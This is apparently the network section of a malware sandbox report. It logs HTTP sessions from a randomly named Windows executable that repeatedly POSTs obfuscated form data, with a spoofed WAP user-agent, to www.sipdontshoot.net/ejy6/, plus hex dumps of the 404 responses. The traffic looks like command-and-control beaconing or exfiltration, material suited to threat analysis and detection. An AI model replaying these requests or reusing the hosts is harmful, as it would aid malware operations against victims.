                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Nov 21, 2024 16:18:11.890003920 CET1082INHTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:11 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S9smxA9CAoaDJkDaO48BC%2BUe5cRz1tAvAZqVhqHryPAkE47hpOwHBJpqZk51nyDpkWVNChxXgw2G%2FqTGHwiCQ4uL6mksdLI8406OwZflfmWwitfoH9naUDE25UZ9Eq4Eyg%2BwB5DYaoo%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e61a6a0dfcc41e9-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1761&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=532&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                    Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>
                                                    Nov 21, 2024 16:18:11.891117096 CET5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.549985216.40.34.41806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:17.907258034 CET795OUTPOST /ejy6/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.sipdontshoot.net
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Origin: http://www.sipdontshoot.net
                                                    Referer: http://www.sipdontshoot.net/ejy6/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 71 49 46 72 68 36 44 48 64 69 79 49 33 4d 54 43 4e 63 4c 52 31 4c 58 34 6d 63 44 71 36 78 37 44 66 30 58 42 6b 48 53 78 6c 35 42 65 41 42 66 4f 7a 58 6c 53 6e 47 44 4c 53 37 69 30 37 45 66 35 63 72 55 65 6f 6f 2f 56 36 58 35 6e 59 32 6c 7a 69 62 36 58 6d 68 35 63 44 67 33 65 77 33 4b 4a 4c 57 53 47 59 4a 53 72 38 49 39 7a 75 54 6d 39 35 48 67 30 6b 62 4c 6c 6f 53 39 46 67 6f 36 62 64 52 79 52 42 4a 4c 44 42 45 55 4c 6a 55 6a 4e 45 2b 31 2f 69 57 58 2b 52 63 56 67 63 4c 64 54 41 44 4a 78 66 4f 76 59 30 4d 45 48 55 36 30 39 64 38 6d 4d 6a 77 75 64 71 6f 71 69 50 6a 53 47 54 78 31 4d 63 43 6b 3d
                                                    Data Ascii: StWXF0Jx=qIFrh6DHdiyI3MTCNcLR1LX4mcDq6x7Df0XBkHSxl5BeABfOzXlSnGDLS7i07Ef5crUeoo/V6X5nY2lzib6Xmh5cDg3ew3KJLWSGYJSr8I9zuTm95Hg0kbLloS9Fgo6bdRyRBJLDBEULjUjNE+1/iWX+RcVgcLdTADJxfOvY0MEHU609d8mMjwudqoqiPjSGTx1McCk=
                                                    Nov 21, 2024 16:18:19.133342981 CET1236INHTTP/1.1 404 Not Found
                                                    content-type: text/html; charset=UTF-8
                                                    x-request-id: 10aad33d-bb1a-4529-b4ba-eb15a1f9f864
                                                    x-runtime: 0.025302
                                                    content-length: 17147
                                                    connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                    Nov 21, 2024 16:18:19.133421898 CET1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                    Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                    Nov 21, 2024 16:18:19.133477926 CET1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                    Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                    Nov 21, 2024 16:18:19.133533001 CET1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                                    Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                                    Nov 21, 2024 16:18:19.133568048 CET1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                                    Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                                    Nov 21, 2024 16:18:19.133603096 CET1236INData Raw: 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61
                                                    Data Ascii: a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#
                                                    Nov 21, 2024 16:18:19.133637905 CET776INData Raw: 72 61 6d 65 2d 69 64 3d 22 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74
                                                    Data Ascii: rame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a>
                                                    Nov 21, 2024 16:18:19.133673906 CET1236INData Raw: 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 37 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 6d 65 74 68 6f 64 5f 6f 76 65 72 72 69 64 65
                                                    Data Ascii: ss="trace-frames" data-frame-id="7" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" d
                                                    Nov 21, 2024 16:18:19.133707047 CET1236INData Raw: 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 37 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 73 65 72 76 65 72 2e 72 62 3a 33 32 38 3a 69
                                                    Data Ascii: s="trace-frames" data-frame-id="17" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></
                                                    Nov 21, 2024 16:18:19.133744955 CET1236INData Raw: 65 20 3d 20 65 6c 2e 63 6c 61 73 73 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 22 20 68 69 64 64 65 6e 22 2c 20 22 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 63 75 72 72 65 6e 74 53 6f 75 72 63 65 20 3d 20 65 6c 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20
                                                    Data Ascii: e = el.className.replace(" hidden", ""); currentSource = el; } } } </script></div> <h2> Routes </h2> <p> Routes match in priority from top to bottom </p> <table id='route_tabl
                                                    Nov 21, 2024 16:18:19.253535986 CET1236INData Raw: 20 64 61 74 61 2d 68 65 6c 70 65 72 3d 27 70 61 74 68 27 3e 0a 20 20 3c 74 64 20 64 61 74 61 2d 72 6f 75 74 65 2d 6e 61 6d 65 3d 27 27 3e 0a 20 20 3c 2f 74 64 3e 0a 20 20 3c 74 64 3e 0a 20 20 20 20 47 45 54 0a 20 20 3c 2f 74 64 3e 0a 20 20 3c 74
                                                    Data Ascii: data-helper='path'> <td data-route-name=''> </td> <td> GET </td> <td data-route-path='/*path(.:format)'> /*path(.:format) </td> <td> <p>main#index {:path=&gt;/.*/}</p> </td></tr> </tbody></table><script type


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.549986216.40.34.41806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:20.572494030 CET815OUTPOST /ejy6/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.sipdontshoot.net
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Origin: http://www.sipdontshoot.net
                                                    Referer: http://www.sipdontshoot.net/ejy6/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 71 49 46 72 68 36 44 48 64 69 79 49 32 76 4c 43 43 62 6e 52 30 72 58 6e 70 38 44 71 7a 52 37 48 66 30 4c 42 6b 43 71 66 6b 4b 31 65 44 67 76 4f 39 32 6c 53 67 47 44 4c 61 62 69 78 2f 45 66 2b 63 72 59 57 6f 74 48 56 36 54 52 6e 59 33 31 7a 68 71 36 55 67 78 35 53 46 67 33 63 30 33 4b 4a 4c 57 53 47 59 4a 57 4e 38 4f 56 7a 75 41 2b 39 34 6c 59 33 70 37 4c 6d 76 53 39 46 6b 6f 36 66 64 52 79 57 42 4c 2f 70 42 47 38 4c 6a 56 7a 4e 45 4d 4e 67 37 6d 58 34 50 73 55 5a 66 34 77 62 59 6c 46 73 64 6f 6d 77 69 74 35 39 52 4d 46 58 48 65 75 6b 77 51 43 6c 36 37 69 56 65 54 7a 76 4a 53 6c 38 43 56 7a 35 62 54 56 75 74 5a 71 61 68 2f 4a 36 44 5a 6e 57 51 55 72 44
                                                    Data Ascii: StWXF0Jx=qIFrh6DHdiyI2vLCCbnR0rXnp8DqzR7Hf0LBkCqfkK1eDgvO92lSgGDLabix/Ef+crYWotHV6TRnY31zhq6Ugx5SFg3c03KJLWSGYJWN8OVzuA+94lY3p7LmvS9Fko6fdRyWBL/pBG8LjVzNEMNg7mX4PsUZf4wbYlFsdomwit59RMFXHeukwQCl67iVeTzvJSl8CVz5bTVutZqah/J6DZnWQUrD
                                                    Nov 21, 2024 16:18:21.717551947 CET1236INHTTP/1.1 404 Not Found
                                                    content-type: text/html; charset=UTF-8
                                                    x-request-id: 3fe04f35-cfa6-45d3-b1a0-28d151e173c8
                                                    x-runtime: 0.036349
                                                    content-length: 17167
                                                    connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                    Nov 21, 2024 16:18:21.717633009 CET1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                    Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                    Nov 21, 2024 16:18:21.717686892 CET1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                    Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                    Nov 21, 2024 16:18:21.717725039 CET1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                                    Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                                    Nov 21, 2024 16:18:21.717760086 CET1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                                    Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                                    Nov 21, 2024 16:18:21.717813015 CET1236INData Raw: 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61
                                                    Data Ascii: a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#
                                                    Nov 21, 2024 16:18:21.717848063 CET1236INData Raw: 72 61 6d 65 2d 69 64 3d 22 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74
                                                    Data Ascii: rame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a>
                                                    Nov 21, 2024 16:18:21.717889071 CET1236INData Raw: 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 65 78 65 63 75 74 6f 72 2e 72 62 3a 31 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d
                                                    Data Ascii: patch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">r
                                                    Nov 21, 2024 16:18:21.717921972 CET1236INData Raw: 2f 20 41 64 64 20 63 6c 69 63 6b 20 6c 69 73 74 65 6e 65 72 73 20 66 6f 72 20 61 6c 6c 20 73 74 61 63 6b 20 66 72 61 6d 65 73 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 74 72 61 63 65 46 72 61 6d 65 73 2e 6c 65 6e
                                                    Data Ascii: / Add click listeners for all stack frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function(e) { e.preventDefault(); var target = e.target; var frame_id = target
                                                    Nov 21, 2024 16:18:21.717962027 CET1236INData Raw: 22 5f 70 61 74 68 22 20 74 69 74 6c 65 3d 22 52 65 74 75 72 6e 73 20 61 20 72 65 6c 61 74 69 76 65 20 70 61 74 68 20 28 77 69 74 68 6f 75 74 20 74 68 65 20 68 74 74 70 20 6f 72 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 50 61 74 68
                                                    Data Ascii: "_path" title="Returns a relative path (without the http or domain)" href="#">Path</a> / <a data-route-helper="_url" title="Returns an absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <
                                                    Nov 21, 2024 16:18:21.837644100 CET1236INData Raw: 6e 79 20 6d 61 74 63 68 65 64 20 72 65 73 75 6c 74 73 20 69 6e 20 61 20 73 65 63 74 69 6f 6e 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 4e 6f 4d 61 74 63 68 28 73 65 63 74 69 6f 6e 2c 20 6e 6f 4d 61 74 63 68 54 65 78 74 29 20 7b 0a
                                                    Data Ascii: ny matched results in a section function checkNoMatch(section, noMatchText) { if (section.children.length <= 1) { section.innerHTML += noMatchText; } } // get JSON from URL and invoke callback with result f


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.549987216.40.34.41806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:23.256458998 CET1832OUTPOST /ejy6/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.sipdontshoot.net
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Origin: http://www.sipdontshoot.net
                                                    Referer: http://www.sipdontshoot.net/ejy6/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 71 49 46 72 68 36 44 48 64 69 79 49 32 76 4c 43 43 62 6e 52 30 72 58 6e 70 38 44 71 7a 52 37 48 66 30 4c 42 6b 43 71 66 6b 4c 4e 65 44 53 6e 4f 79 31 39 53 68 47 44 4c 51 37 69 77 2f 45 66 76 63 76 38 53 6f 73 37 76 36 56 56 6e 59 56 74 7a 70 34 53 55 75 78 35 53 48 67 33 64 77 33 4b 6d 4c 57 69 43 59 4a 47 4e 38 4f 56 7a 75 42 4f 39 37 33 67 33 36 72 4c 6c 6f 53 39 4a 67 6f 37 41 64 52 71 5a 42 4c 36 65 42 57 63 4c 69 30 44 4e 44 70 5a 67 79 6d 58 36 4f 73 55 6f 66 34 38 55 59 6a 68 67 64 6f 37 62 69 71 56 39 53 71 4e 4d 64 76 4b 56 69 77 57 39 32 49 6d 41 49 44 79 44 45 51 5a 70 64 56 62 6c 62 69 74 42 6a 4e 71 66 71 39 6f 56 52 2f 33 52 51 77 4b 74 4d 52 34 54 63 77 54 32 72 72 34 72 68 58 75 54 36 6b 4b 76 43 66 30 30 48 4d 54 67 6d 64 35 33 6e 51 32 5a 39 47 51 6f 50 46 38 70 6c 74 50 32 4a 6f 54 52 58 56 4d 31 50 4c 46 50 59 4f 6c 43 4b 6d 34 4d 73 6b 6a 34 75 6f 79 34 69 31 30 33 71 76 74 37 4d 4a 63 62 33 36 77 4d 6f 59 6d 2b 64 56 4f 65 52 7a 4c 6f 65 6a 38 56 50 [TRUNCATED]
